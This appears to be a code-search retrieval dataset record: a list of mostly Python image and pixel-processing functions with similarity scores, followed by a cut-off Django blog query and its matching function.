lut_[0]=lut[0].astype(Numeric.UInt8)\n lut_[1]=lut[1].astype(Numeric.UInt8)\n lut_[2]=lut[2].astype(Numeric.UInt8)\n\n # This is much faster than the original zip/ravel variant ...\n rgb[:,0]=Numeric.take(lut_[0],a)\n #print \"rtake\"\n rgb[:,1]=Numeric.take(lut_[1],a)\n #print \"gtake\"\n rgb[:,2]=Numeric.take(lut_[2],a)\n #print \"btake\"\n #rgb=Numeric.ravel(((Numeric.array(zip(r,g,b),\n # typecode=Numeric.UInt8))))\n\n #print \"rgb done\"\n else:\n N = len(lut[0])\n print \"LUT with N=%d entries\" % N\n if N>=256*256:\n print \"UUPS, more than uint16 colors??\", N\n raise ValueError(\"N too large\")\n \n a = (Numeric.ravel((N-1)*(a-a_min)/\n (a_max-a_min))).astype(Numeric.UInt16)\n\n rgb = Numeric.zeros( (len(a), 3), typecode=Numeric.UInt16)\n\n lut_ = Numeric.zeros( (3,len(lut[0])), Numeric.UInt16)\n lut_[0] = lut[0].astype(Numeric.UInt16)\n lut_[1] = lut[1].astype(Numeric.UInt16)\n lut_[2] = lut[2].astype(Numeric.UInt16)\n\n # This is much faster than the original zip/ravel variant ...\n rgb[:,0] = Numeric.take(lut_[0],a)\n rgb[:,1] = Numeric.take(lut_[1],a)\n rgb[:,2] = Numeric.take(lut_[2],a)\n\n rgb = (rgb*256.0/N).astype(Numeric.UInt8)\n\n else: # simple grey scale ramp...\n a=(Numeric.ravel(255.0*(a-a_min)/\n (a_max-a_min))).astype(Numeric.UInt8)\n # convert to (r_0,g_0,b_0,r_1,g_1,b_1,....)\n rgb=Numeric.ravel(Numeric.array(zip(a,a,a)))\n\n # create a PIL RGB image\n #print \"w/h\",w,h\n im=Image.new(\"RGB\",(w,h))\n #print \"imfromstring:\"\n im.fromstring(rgb.tostring())\n #print \"done ...\"\n \n # scale image ?\n if height!=None and width==None:\n im=im.resize(w/h*height,height)\n elif height==None and width!=None:\n im=im.resize(width,h/w*width)\n elif height!=None and width!=None:\n im=im.resize(width,height)\n\n return(im)", "def encode(cls, data):\n t, img = data\n # Cast double time into eight 8-bit integers\n#\t\tta=np.array(binary_cast([t],'d','hhhh'))\n ta = np.array(binary_cast([t], 'd', 'BBBBBBBB'))\n # Cast w,h 16-bit unsigned integers into two unsigned 8-bit integers\n cp = cls.compress(img)\n out = np.concatenate((ta, cp)).astype('B')\n return out", "def getPixel(self,x,y) :\n # check the bounds to make sure we are in the correct area\n if x<0 or x>self.m_width :\n print \"error x out of bounds\\n\"\n return\n if y<0 or y>self.m_height :\n print \"error y our of bounds\\n\"\n return\n # now calculate the index into the 1D array of data\n index=(y*self.m_width*4)+x*4\n # grab the pixels\n red = self.getUcharArrayItem(self.charPixelPtr,index)\n green = self.getUcharArrayItem(self.charPixelPtr,index+1)\n blue = self.getUcharArrayItem(self.charPixelPtr,index+2)\n alpha=self.getUcharArrayItem(self.charPixelPtr,index+3)\n return (red,green,blue,alpha)", "def PixbufFromData(self, data):\n loader = gtk.gdk.PixbufLoader()\n loader.write(data)\n loader.close()\n pixbuf = loader.get_pixbuf()\n return pixbuf", "def display(array):\n if isinstance(array, np.ndarray):\n plt.imshow(array)\n plt.show()\n else:\n raise TypeError(\"display() needs a numpy ndarray as parameter, \"\n f\"got {type(array)}\")", "def get_raw(self) -> bytearray:\n img_bytes = bytearray()\n for i in range(self.grid_size[0]):\n if self.grid[i] is not None:\n for j in range(self.grid_size[1]):\n if self.grid[i][j] is not None:\n color = self.grid[i][j]\n color = color.get_byte_representation()\n for k in range(len(color)):\n img_bytes.append(color[k])\n return img_bytes", "def to_nibble_array(arr: ndarray) -> ndarray:\n arr = arr.ravel()\n return (arr[::2] + (arr[1::2] << 4)).astype(\"uint8\")", "def getPixel(data,x,y):\n d0= data[y,x*2]\n \n if ( (d0[0]==255) and (d0[1]==127)):\n return [0.0,0.0,0.0]\n d1= data[y,x*2+1]\n test=_U()\n test.data=(c_ubyte * 6)(d0[0],d0[1],d0[2],d1[0],d1[1],d1[2])\n X=hex (test.DistXYZ.x)\n Y=hex (test.DistXYZ.y)\n Z=hex (test.DistXYZ.z)\n \n X=float(int(X,16)-int(\"0x7FFF\",16))/1000.0\n Y=float(int(Y,16)-int(\"0x7FFF\",16))/1000.0\n Z=float(int(Z,16)-int(\"0x7FFF\",16))/1000.0\n return [X,Y,Z]", "def draw_pixel(x, y, col):\n unicornhathd.set_pixel(x, 12 - y, col[0], col[1], col[2])", "def generate_pixels_8bit(image):\n\n w, h = image.size\n for y in range(h):\n for x in range(w):\n value = pack_argb8(image.getpixel((x, y)))\n yield value\n\n raise StopIteration", "def render_2d_vector(v1, gridsize=50):\n\n fb = pixel_op() \n fb.create_buffer(800, 800)\n fb.graticule(gridsize)\n fb.render_vector_2d( v1, scale=gridsize)\n fb.save('vec.png')", "def display_image ( X ):\r\n\t# on teste que le tableau contient bien 256 valeurs\r\n\tif X.size != 256:\r\n\t\traise ValueError ( \"Les images doivent etre de 16x16 pixels\" )\r\n\r\n\t# on cree une image pour imshow: chaque pixel est un tableau a 3 valeurs\r\n\t# (1 pour chaque canal R,G,B). Ces valeurs sont entre 0 et 1\r\n\tY = X / X.max ()\r\n\timg = np.zeros ( ( Y.size, 3 ) )\r\n\tfor i in range ( 3 ):\r\n\t\timg[:,i] = X\r\n\r\n\t# on indique que toutes les images sont de 16x16 pixels\r\n\timg.shape = (16,16,3)\r\n\r\n\t# affichage de l'image\r\n\tplt.imshow( img )\r\n\tplt.show ()", "def _webp(self, tile: bytes) -> np.ndarray:\n decoded = np.rollaxis(imagecodecs.webp_decode(tile), 2, 0)\n return decoded", "def camera_to_pixel(self, X):\n raise NotImplementedError", "def display_image(mat):\n\timg = Image.fromarray(mat)\n\timg.show()", "def visualize_output(\n self,\n img: np.ndarray,\n output_data: Any):\n raise NotImplementedError", "def render_dataset(dataset: np.ndarray, unrendered: np.ndarray, args) -> np.ndarray:\n assert len(unrendered) == len(dataset), 'unrendered and dataset must be of equal size'\n math_mode = '$$'if args.mode == 'equation' else '$'\n os.makedirs(args.out, exist_ok=True)\n # remove successfully rendered equations\n rendered = np.array([int(os.path.basename(img).split('.')[0])\n for img in glob.glob(os.path.join(args.out, '*.png'))])\n valid = [i for i, j in enumerate(unrendered) if j not in rendered]\n # update unrendered and dataset\n dataset = dataset[valid]\n unrendered = unrendered[valid]\n order = np.random.permutation(len(dataset)) if args.shuffle else np.arange(len(dataset))\n faulty = []\n for batch_offset in tqdm(range(0, len(dataset), args.batchsize), desc=\"global batch index\"):\n batch = dataset[order[batch_offset:batch_offset+args.batchsize]]\n #batch = [x for j, x in enumerate(batch) if order[i+j] not in indices]\n if len(batch) == 0:\n continue\n valid_math = np.asarray([[i, \"%s %s %s\" % (math_mode, x, math_mode)] for i, x in enumerate(\n batch) if x != ''], dtype=object) # space used to prevent escape $\n #print('\\n', i, len(math), '\\n'.join(math))\n font = font = np.random.choice(args.font) if len(\n args.font) > 1 else args.font[0]\n dpi = np.random.choice(np.arange(min(args.dpi), max(args.dpi))) if len(\n args.dpi) > 1 else args.dpi[0]\n if len(valid_math) > 0:\n valid_idx, math = valid_math.T\n valid_idx = valid_idx.astype(np.int32)\n try:\n if args.preprocess:\n pngs, error_index = tex2pil(\n math, dpi=dpi, font=font, return_error_index=True)\n else:\n pngs, error_index = Latex(math, dpi=dpi, font=font).write(\n return_bytes=False)\n # error_index not count \"\" line, use valid_idx transfer to real index matching in batch index\n local_error_index = valid_idx[error_index]\n # tranfer in batch index to global batch index\n global_error_index = [\n batch_offset+_ for _ in local_error_index]\n faulty.extend(list(unrendered[order[global_error_index]]))\n except Exception as e:\n print(\"\\n%s\" % e, end='')\n faulty.extend(\n list(unrendered[order[batch_offset:batch_offset+args.batchsize]]))\n continue\n\n for inbatch_idx, order_idx in enumerate(range(batch_offset, batch_offset+args.batchsize)):\n # exclude render failed equations and blank line\n if inbatch_idx in local_error_index or inbatch_idx not in valid_idx:\n continue\n outpath = os.path.join(args.out, '%07d.png' % unrendered[order[order_idx]])\n png_idx = np.where(valid_idx == inbatch_idx)[0][0]\n if args.preprocess:\n try:\n data = np.asarray(pngs[png_idx])\n # print(data.shape)\n # To invert the text to white\n gray = 255*(data[..., 0] < 128).astype(np.uint8)\n white_pixels = np.sum(gray == 255)\n # some png will be whole white, because some equation's syntax is wrong\n # eg.$$ \\mathit { \\Iota \\Kappa \\Lambda \\Mu \\Nu \\Xi \\Omicron \\Pi } $$\n # extract from wikipedia english dump file https://dumps.wikimedia.org/enwiki/latest/\n white_percentage = (white_pixels / (gray.shape[0] * gray.shape[1]))\n if white_percentage == 0:\n continue\n # Find all non-zero points (text)\n coords = cv2.findNonZero(gray)\n # Find minimum spanning bounding box\n a, b, w, h = cv2.boundingRect(coords)\n rect = data[b:b+h, a:a+w]\n im = Image.fromarray((255-rect[..., -1]).astype(np.uint8)).convert('L')\n dims = []\n for x in [w, h]:\n div, mod = divmod(x, args.divable)\n dims.append(args.divable*(div + (1 if mod > 0 else 0)))\n padded = Image.new('L', dims, 255)\n padded.paste(im, (0, 0, im.size[0], im.size[1]))\n padded.save(outpath)\n except Exception as e:\n print(e)\n pass\n else:\n shutil.move(pngs[png_idx], outpath)\n # prevent repeat between two error_index and imagemagic error\n faulty = list(set(faulty))\n faulty.sort()\n return np.array(faulty)", "def arr(img_arr, img_wid, img_hei):\n X = torch.Tensor(img_arr).view(-1, 1, img_wid, img_hei)\n X = X/255.0\n return X", "def to_uint8(f):\n from numpy import array, clip, uint8\n\n img = array(clip(f,0,255),uint8)\n return img", "def image_decoder(rawbytes):\n img = Image.open(BytesIO(rawbytes))\n array = np.asarray(img, dtype=np.uint8)\n return array", "def _drawArray(d, data, x, y, scale = 5, color = (255, 255, 255), cCluster = (0, 0, 0)):\n for j in range(data.shape[0]):\n for i in range(data.shape[1]):\n c = (int(color[0] * data[j][i]), int(color[1] * data[j][i]), \\\n int(color[2] * data[j][i]))\n xp = x + scale * i\n yp = y + scale * j\n \n d.rectangle(((xp, yp), (xp + scale - 1, yp + scale - 1)), fill = c)\n \n xp = x + scale * data.shape[1]\n yp = y + scale * j\n d.rectangle(((xp, yp), (xp + scale - 1, yp + scale - 1)), fill = cCluster)", "def bytePlot(f):\n dimensions = getDims(f)\n data = np.array(f)\n data = np.pad(\n data, (0, dimensions[0]-(len(data)%dimensions[0])), 'constant')\n data = np.reshape(data, (-1, dimensions[0]))\n return data", "def putpixel(self, col, row, color=GREEN):\n if col < 0 or row < 0:\n return\n try:\n self.vram[row][col] = color\n except IndexError:\n pass", "def _encode_pixel(color):\n return struct.pack(_ENCODE_PIXEL, color)", "def raw_image(self):\n return self.data16.transpose()", "def pixel(self, x, y):\n \n # Pixel data is unsigned char (8bit unsigned integer),\n # and there are for (blue,green,red,alpha)\n data_format = \"BBBB\"\n \n # Calculate offset, based on\n # http://www.markj.net/iphone-uiimage-pixel-color/\n offset = 4 * ((self.width*int(round(y))) + int(round(x)))\n \n # Unpack data from string into Python'y integers\n b, g, r, a = struct.unpack_from(data_format, self._data, offset=offset)\n \n # Return BGRA as RGBA\n return (r, g, b, a)", "def reshape_pixel_array(self, pixel_arr):\n reshaped_pixel_arr = []\n n = 28\n while n <= len(pixel_arr):\n reshaped_pixel_arr.append(pixel_arr[n-28:n])\n n+=28\n\n return reshaped_pixel_arr", "def pack_argb8(pixel):\n\n r, g, b, a = pixel\n if a == 0:\n value = 0\n else:\n value = (a & 0xc0) | ((r & 0xc0) >> 2) | ((g & 0xc0) >> 4) | ((b & 0xc0) >> 6)\n return value", "def convertNumpy2Image(self, array):\n cv2image = cv2.cvtColor(array, cv2.COLOR_BGR2RGBA)\n img = Image.fromarray(cv2image)\n imgtk = ImageTk.PhotoImage(image=img)\n return imgtk", "def to_image_space(data):\n return np.swapaxes(np.flip(data, 1), 0, 1)", "def displayData(indices_to_display = None):\n width, height = 20, 20\n nrows, ncols = 10, 10\n if not indices_to_display:\n indices_to_display = random.sample(range(X.shape[0]), nrows*ncols)\n \n big_picture = np.zeros((height*nrows,width*ncols))\n \n irow, icol = 0, 0\n for idx in indices_to_display:\n if icol == ncols:\n irow += 1\n icol = 0\n iimg = getDatumImg(X[idx])\n big_picture[irow*height:irow*height+iimg.shape[0], icol*width:icol*width+iimg.shape[1]] = iimg\n icol += 1\n fig = plt.figure(figsize=(6,6))\n\n big_picture = (big_picture * 255).astype(np.int8)\n img = Image.fromarray(big_picture, mode='L')\n plt.imshow(img, cmap = cm.Greys)", "def save_array_as_rgb_image(data, image_name):\n data_dim = len(data.shape)\n if(data_dim == 3):\n assert(data.shape[0] == 3 or data.shape[2] == 3)\n if(data.shape[0] == 3):\n data = np.transpose(data, [1, 2, 0])\n img = Image.fromarray(data)\n img.save(image_name)", "def bytes_to_img(bytes_array):\n stream = BytesIO(bytes_array)\n image = Image.open(stream).convert(\"RGBA\")\n\n return image", "def render_mat(self) -> np.ndarray:\n im = self.image.numpy()[0, :, :, :].astype(np.float)\n cm = self.colormask.astype(np.float)\n out = cv2.addWeighted(cm, 0.35, im, 1 - 0.35, 0)\n out = skimage.img_as_ubyte(out)\n return out", "def _pixel_coord_np(width, height):\n x = np.linspace(0, width - 1, width).astype(np.int32)\n y = np.linspace(0, height - 1, height).astype(np.int32)\n [x, y] = np.meshgrid(x, y)\n return np.vstack((x.flatten(), y.flatten(), np.ones_like(x.flatten())))", "def set_pixel(self, x, y, r, g, b, a):\n\t\t\n\t\ti = 4 * (y * self.width + x)\n\t\tself.buffer[i : i + 4] = array.array('f', struct.pack('ffff', r, g, b, a))", "def interpolate_to_pixel(U, imshape, kind=\"linear\") -> np.ndarray:\n # Velocity components\n u, v = U\n nr, nc = u.shape\n\n ws_x = int(np.round(imshape[0] / nr))\n ws_y = int(np.round(imshape[1] / nc))\n\n x, y = np.arange(nr) * ws_x + ws_x // 2, np.arange(nc) * ws_y + ws_y // 2\n xi, yi = np.arange(imshape[0]), np.arange(imshape[1])\n\n # Interpolate to pixel level\n u_px = scipy.interpolate.interp2d(y, x, u, kind=kind)(yi, xi)\n v_px = scipy.interpolate.interp2d(y, x, v, kind=kind)(yi, xi)\n\n return np.stack((u_px, v_px))", "def _show_numpy(tensor: ndarray, zoom: float = 1.) -> None:\n from PIL import Image\n shape = tuple(map(lambda s: round(s * zoom), tensor.shape))\n Image.fromarray(tensor).resize((shape[1], shape[0])).show()", "def one_2_uint8(one_arr):\n assert (one_arr.dtype == 'float' and np.max(one_arr <= 1.0)), \\\n 'improc.one_2_uint8() only accepts floats arrays from 0 to 1.'\n return (255*one_arr).astype('uint8')", "def arr2img(ar):\n return Image.fromstring('L', (ar.shape[1], ar.shape[0]), ar.astype('b').tostring())", "def display_image(np_rgb, text=None, scale_up=False):\n if scale_up:\n np_rgb = np.repeat(np_rgb, slide.SCALE_FACTOR, axis=1)\n np_rgb = np.repeat(np_rgb, slide.SCALE_FACTOR, axis=0)\n\n img_r, img_c, img_ch = np_rgb.shape\n if text is not None:\n np_t = np_text(text)\n t_r, t_c, _ = np_t.shape\n t_i_c = max(t_c, img_c)\n t_i_r = t_r + img_r\n t_i = np.zeros([t_i_r, t_i_c, img_ch], dtype=np.uint8)\n t_i.fill(255)\n t_i[0:t_r, 0:t_c] = np_t\n t_i[t_r:t_r + img_r, 0:img_c] = np_rgb\n np_rgb = t_i\n\n pil_img = util.np_to_pil(np_rgb)\n pil_img.show()", "def processing_data(raw_data):\n data = np.frombuffer(raw_data, np.uint8)\n data = np.reshape(data, [data.shape[0]//1029, -1])\n data = data[:, 5:]\n data = np.reshape(data, [1, -1])\n data = 256 * data[0, 0::2] + data[0, 1::2]\n data = 10 * (data / 65535)\n data = np.reshape(data, [-1, 8]).T\n return data", "def _encode_pixel(self, color):\n return struct.pack(_ENCODE_PIXEL, color)", "def render_image(self, rgbobj, dst_x, dst_y):\n self.logger.debug(\"redraw pixmap=%s\" % (self.pixmap))\n if self.pixmap is None:\n return\n self.logger.debug(\"drawing to pixmap\")\n\n # Prepare array for rendering\n arr = rgbobj.get_array(self.rgb_order, dtype=np.uint8)\n (height, width) = arr.shape[:2]\n\n return self._render_offscreen(self.pixmap, arr, dst_x, dst_y,\n width, height)", "def figure_buffer(self, fig, dpi=180):\n buf = io.BytesIO()\n fig.savefig(buf, format=\"png\", dpi=dpi)\n buf.seek(0)\n img_arr = np.frombuffer(buf.getvalue(), dtype=np.uint8)\n buf.close()\n img = cv2.imdecode(img_arr, 1)\n img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)\n return img", "def get_ht1632_data(self, matrix_row, matrix_col):\n start_row = matrix_row * 8\n stop_row = start_row + 8\n start_col = matrix_col * 16\n stop_col = start_col + 16\n return [\n self.pixel(col, row)\n for col in range(start_col, stop_col)\n for row in range(start_row, stop_row)\n ]", "def from_bytes(data):\n\tstream = Gio.MemoryInputStream.new_from_bytes(GLib.Bytes.new(data))\n\tpixbuf = GdkPixbuf.Pixbuf.new_from_stream(stream)\n\treturn pixbuf", "def get_pixels(self):\n\n # pygame board needs to be initialized the first time\n if not self.board:\n self.setup_display(render_gui=False)\n\n self.draw_window(draw_leaderboard=False)\n pixels = pygame.surfarray.array3d(self.window)\n return np.moveaxis(pixels, 1, 0)", "def generate_array_image(R, G, B, height, width):\n R = R.reshape((height, width))\n G = G.reshape((height, width))\n B = B.reshape((height, width))\n \n return np.moveaxis(np.array([R, G, B]), 0, -1)", "def get_pixel(framebuf, x, y):\n index = (y * framebuf.stride + x) * 3\n return (\n (framebuf.buf[index] << 16)\n | (framebuf.buf[index + 1] << 8)\n | framebuf.buf[index + 2]\n )", "def to_uint8(image):\n\tnp.clip(image, 0, 255, out=image)\n\treturn image.astype(np.uint8)", "def get_pixel(framebuf, x, y):\n index = (y * framebuf.stride + x) * 2\n lobyte, hibyte = framebuf.buf[index : index + 2]\n r = hibyte & 0xF8\n g = ((hibyte & 0x07) << 5) | ((lobyte & 0xE0) >> 5)\n b = (lobyte & 0x1F) << 3\n return (r << 16) | (g << 8) | b" ]
[ "0.6824776", "0.6289643", "0.5894268", "0.5886476", "0.58250576", "0.5715473", "0.570549", "0.5702945", "0.5690092", "0.56785333", "0.567429", "0.56699634", "0.56405544", "0.5639835", "0.5638185", "0.562523", "0.56111133", "0.5560625", "0.5559693", "0.5551056", "0.55414987", "0.55404687", "0.5497478", "0.54909956", "0.54908717", "0.5487129", "0.5472244", "0.54575133", "0.54445475", "0.5416843", "0.53842056", "0.5360287", "0.53382057", "0.53333724", "0.5324806", "0.5319079", "0.53135884", "0.52972376", "0.5284001", "0.526344", "0.5256617", "0.5254836", "0.5239072", "0.5238882", "0.52316225", "0.5229748", "0.5219843", "0.52118385", "0.52095634", "0.5203036", "0.5198323", "0.5187384", "0.51754314", "0.51659846", "0.5161304", "0.51577604", "0.5154468", "0.5150978", "0.5147023", "0.5146126", "0.5144532", "0.5108669", "0.51086164", "0.5089184", "0.5086065", "0.50808626", "0.5080299", "0.50797385", "0.5077698", "0.5062006", "0.5049658", "0.5049257", "0.5048506", "0.5044828", "0.50437844", "0.5025942", "0.50256795", "0.5017992", "0.50082237", "0.50060034", "0.50010383", "0.4998211", "0.49882638", "0.49865824", "0.49841192", "0.49837956", "0.49699587", "0.49677193", "0.4961766", "0.49613863", "0.49611038", "0.49400276", "0.49353912", "0.49270174", "0.49241015", "0.49221358", "0.49196392", "0.49190542", "0.49175516", "0.49166167", "0.4913591" ]
0.0
-1
Adds 5 latest blog posts as `latest_articles`, 5 latest comments as `latest_comments`, and all tags (annotated with `num_articles` field) as `tags` to the context, regardless of `request`.
def latest_content(request): latest_articles = Article.published_articles()[:5] latest_comments = Comment.objects.all().order_by('-pub_date')[:5] tags = Tag.objects.annotate(num_articles=Count('article')).order_by( '-num_articles') contributors = Contributor.objects.annotate( num_articles=Count('article')).order_by('-num_articles') return {'latest_articles': latest_articles, 'latest_comments': latest_comments, 'tags': tags, 'contributors': contributors, }
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def latest_blog_posts(self, request, *args, **kwargs):\n context = self.get_context(request, *args, **kwargs)\n context[\"latest_posts\"] = MyblogDetailPage.objects.live().public()[:1] \n return render(request, \"myblog/latest_posts.html\", context)", "def last_five(request):\n flag_five = True\n topics = (\n request.db[\"topic\"].find().sort([(\"$natural\", -1), (\"topic_date\", -1)]).limit(5)\n )\n\n return render_to_response(\n \"templates/home.html\",\n {\"topics\": topics, \"flag_five\": flag_five, \"count\": count(request)},\n request=request,\n )", "def get_context(self, request):\n articles = self.articles\n\n # Filtering by tag\n tag = request.GET.get('tag')\n if tag:\n articles = articles.filter(tags__name=tag)\n\n # Pagination, using the blog settings\n page = request.GET.get('page')\n page_number = BlogSettings.for_site(request.site).page_number\n paginator = Paginator(articles, page_number)\n try:\n articles = paginator.page(page)\n except PageNotAnInteger:\n articles = paginator.page(1)\n except EmptyPage:\n articles = paginator.page(paginator.num_pages)\n\n # Updating the template context\n context = super(Blog, self).get_context(request)\n context['articles'] = articles\n context['current_tag'] = tag\n return context", "def get_context_data(self, **kwargs):\n data = super().get_context_data(**kwargs)\n posts = BlogPost.objects.all()\\\n .select_related(\"author\")\\\n .prefetch_related(\"tags\")\\\n .filter(is_published=True)\\\n .order_by('-published_at', 'id')\n\n if 'lastPublished' in self.request.GET:\n last_published = datetime.strptime(self.request.GET['lastPublished'], self.DATE_FORMAT)\n posts = posts.filter(published_at__lt=last_published)\n\n if 'tag_slug' in kwargs:\n posts = posts.filter(tags__slug__in=(kwargs['tag_slug'], ))\n\n if 'author_id' in kwargs:\n posts = posts.filter(author=kwargs['author_id'])\n\n data['has_more'] = posts.count() > 10\n\n posts = list(posts[:10])\n data['last_published'] = min([i.published_at for i in posts]) if posts else None\n data['last_published'] = data['last_published'].strftime(self.DATE_FORMAT) if data['last_published'] else None\n data['posts'] = posts\n\n return data", "def get_recent_posts(self, request, count):\n if request.has_permission('edit'):\n return DBSession.query(Post).filter_by(blog=self).order_by('created desc').slice(0, count).all()\n else:\n return DBSession.query(Post).filter_by(blog=self, published=True).order_by('created desc').slice(0, count).all()", "def get_context(self, request, *args, **kwargs):\n context = super().get_context(request, *args, **kwargs)\n all_posts = BlogDetailPage.objects.all().order_by('-first_published_at')\n paginator = Paginator(all_posts, 1)\n page = request.GET.get(\"page\")\n try:\n posts = paginator.page(page)\n except PageNotAnInteger:\n posts = paginator.page(1)\n except EmptyPage:\n posts = paginator.page(paginator.num_pages)\n\n context[\"posts\"] = posts\n context[\"authors\"] = BlogAuthor.objects.all()\n context[\"reverse_url\"] = self.reverse_subpage('latest_posts')\n context[\"categories\"] = BlogCategory.objects.all()\n return context", "def blog(request):\n\tlatest_posts = Post.objects.all().order_by('-created_at')\n\tpopular_posts = Post.objects.all().order_by('-views')[:5]\n\tfor post in latest_posts:\n\t\tpost.url = encode_url(post.title)\n\tfor popular_post in popular_posts:\n\t\tpopular_post.url = encode_url(popular_post.title)\n\treturn render(request, 'blog/blog.html', {'latest_posts': latest_posts, \n\t\t\t\t\t\t\t\t\t\t\t 'popular_posts': popular_posts})", "def latest(request):\n post_list = Post.objects.exclude(hidden = True).order_by('-created')\n paginator = Paginator(post_list, 10)\n try:\n page = int(request.GET.get('page', '1'))\n except ValueError:\n page = 1\n try:\n posts = paginator.page(page)\n except EmptyPage, InvalidPage:\n posts = paginator.page(paginator.num_pages)\n return render(request, 'blog/latest.html', {'posts': posts},\n context_instance = RequestContext(request))", "def index(request):\n\n num_posts = BlogPost.objects.all().count()\n num_bloggers = Blogger.objects.all().count()\n latest_blog = BlogPost.objects.latest('post_date')\n\n context = {\n 'num_posts': num_posts,\n 'num_bloggers': num_bloggers,\n 'latest_blog': latest_blog,\n }\n\n return render(request, 'index.html', context=context)", "def index(request, archive=False):\n context = {'archive':archive}\n posts = Post.objects.all()\n if not archive:\n posts = posts[:10]\n context['posts'] = posts\n if request.user.is_authenticated():\n #These are the new news items the logged in user has\n context['new_posts'] = NewBlog.objects.filter(user=request.user)\n return render(request, 'blog/index.html', context)", "def topic_recent(request):\n posts = Post.objects.all().order_by(\"-created\")[:3]\n posts = mk_paginator(request, posts, DJANGO_SIMPLE_FORUM_REPLIES_PER_PAGE)\n # topic = Topic.objects.get(pk=topic_id)\n return render_to_response(\"forum/topic_recent.html\", add_csrf(request, posts=posts), context_instance=RequestContext(request))", "def get_context(self, request, *args, **kwargs):\n context = super().get_context(request, *args, **kwargs)\n # Get all posts\n all_posts = BlogPage.objects.live().public() \\\n .order_by(\n '-first_published_at'\n )\n date_sorted_posts = sorted(\n all_posts, key=lambda p: p.specific.date, reverse=True\n )\n # Paginate all posts by 5 per page\n paginator = Paginator(date_sorted_posts, 5)\n # Try to get the ?page=x value\n page = request.GET.get(\"page\")\n try:\n # If the page exists and the ?page=x is an int\n posts = paginator.page(page)\n except PageNotAnInteger:\n # If the ?page=x is not an int; show the first page\n posts = paginator.page(1)\n except EmptyPage:\n # If the ?page=x is out of range (too high most likely)\n # Then return the last page\n posts = paginator.page(paginator.num_pages)\n\n # \"posts\" will have child pages; you'll need to use .specific in the template\n # in order to access child properties, such as youtube_video_id and subtitle\n context[\"posts\"] = posts\n return context", "def top_5_news():\n top_five = []\n\n news = (db.news.find({}).sort([\n ('shares_count', pymongo.DESCENDING),\n ('comments_count', pymongo.DESCENDING),\n ('title', pymongo.ASCENDING)\n ]).limit(5))\n\n for new in news:\n top_five.append((new['title'], new['url']))\n\n return top_five", "def get_recently_articles(cls, num):\n return cls.objects.values('title', 'view_times', 'update_time', 'author')\\\n .filter(status=0).order_by('-update_time')[:num]", "def api_get_threads(request, count):\n\n if PARAMETER_TAG in request.GET:\n tag_name = request.GET[PARAMETER_TAG]\n if tag_name is not None:\n tag = get_object_or_404(Tag, name=tag_name)\n threads = tag.threads.filter(archived=False)\n else: \n threads = Thread.objects.filter(archived=False)\n\n if PARAMETER_OFFSET in request.GET:\n offset = request.GET[PARAMETER_OFFSET]\n offset = int(offset) if offset is not None else 0\n else:\n offset = 0\n\n threads = threads.order_by('-bump_time')\n threads = threads[offset:offset + int(count)]\n\n opening_posts = []\n for thread in threads:\n opening_post = thread.get_opening_post()\n\n # TODO Add tags, replies and images count\n opening_posts.append(_get_post_data(opening_post.id,\n include_last_update=True))\n\n return HttpResponse(content=json.dumps(opening_posts))", "def recent(request):\r\n rdict = request.matchdict\r\n params = request.params\r\n\r\n # Make sure we generate a url to feed our rss link.\r\n current_route = request.current_route_url()\r\n\r\n # check for auth related stuff\r\n # are we looking for a specific user\r\n username = rdict.get('username', None)\r\n if username:\r\n username = username.lower()\r\n\r\n # do we have any tags to filter upon\r\n tags = rdict.get('tags', None)\r\n\r\n if isinstance(tags, str):\r\n tags = [tags]\r\n\r\n ret = {\r\n 'username': username,\r\n 'tags': tags,\r\n 'rss_url': current_route.replace('recent', 'rss')\r\n }\r\n\r\n # if we've got url parameters for the page/count then use those to help\r\n # feed the init of the ajax script\r\n ret['count'] = params.get('count') if 'count' in params else RESULTS_MAX\r\n ret['page'] = params.get('page') if 'page' in params else 0\r\n\r\n # Do we have any sorting criteria?\r\n ret['sort'] = params.get('sort') if 'sort' in params else None\r\n\r\n return ret", "def get_recent_posts(self, numposts=10, blogid=1):\n return self.execute('metaWeblog.getRecentPosts', blogid, self.username, self.password, numposts)", "def get_top_articles(\n limit: int = 5,\n date: int = int(datetime.now().strftime(\"%Y%m%d\"))\n):\n\n res = articles_db.get_top_articles_mongo(\n articles,\n limit,\n date\n )\n\n return res", "def get_latest_posts(parser, token):\n\ttry:\n\t\ttag_name, arg = token.contents.split(None, 1)\n\texcept ValueError:\n\t\traise template.TemplateSyntaxError, \"%s tag requires arguments\" % token.contents.split()[0]\n\t\n\tm = re.search(r'(.*?) as (\\w+)', arg)\n\t\n\tif not m:\n\t\traise template.TemplateSyntaxError, \"%s tag had invalid arguments\" % tag_name\n\t\n\tformat_string, var_name = m.groups()\n\t\n\treturn LatestPosts(format_string[0], var_name)", "def get_context(self, request, *args, **kwargs):\n\n context = super().get_context(request, *args, **kwargs)\n context['posts'] = BlogDetailPage.objects.live().public()\n return context", "def add_new_posts(last_updated=None):\n for blog in Blog.objects.all():\n try:\n document = feedparser.parse(blog.feed_url)\n except:\n print \"error parsing\"\n continue\n\n if last_updated is None:\n print(\"- Adding %i articles from %s\" % (len(document['entries']), blog.title))\n\n for entry in document['entries']:\n # now we create a new post\n post = Post()\n post.blog = blog\n post.title = entry['title']\n\n if 'summary' in entry:\n post.content = entry['summary']\n if 'content' in entry:\n post.content = entry['content']\n\n post.link = entry['link']\n post.save()\n else:\n # TODO: only parse from a date\n pass", "def GET_front_recent_posts(self, *a, **kw):\r\n # Server side cache is also invalidated when new article is posted\r\n return self.render_cached('recent-promoted', RecentPromotedArticles, g.side_posts_max_age)", "def get_featured_articles(request):\n try:\n count = 1\n if 'count' in request.POST and int(request.POST['count']):\n count = int(request.POST['count'])\n\n newest_list = []\n for article in Article.objects.order_by('-modified')[:count]:\n newest_list.append(article.dump_to_dict())\n\n popular_list = []\n for article in Article.objects.order_by('-views')[:count]:\n popular_list.append(article.dump_to_dict())\n\n return format_ajax_response(True, \"Featured articles retrieved successfully.\", {'newest': newest_list,'popular': popular_list})\n except Exception as ex:\n logger.error(\"Failed to get_featured_articles: %s\" % ex)\n return format_ajax_response(False, \"There was an error retrieving the featured articles.\")", "def sb_related_posts(post, num=5):\n # defer some of the heavier post fields once the defer+annotate bug has been fixed\n posts = Post.objects.published().filter(tag__in=post.tags).exclude(id=post.id).annotate(weight=models.Count('tag')).order_by('-weight', '-date')[:num]\n return dict(blog=Blog.get_active(), posts=posts)", "def BestPosts(request):\r\n \r\n context = {\r\n # Sort by count\r\n 'posts': 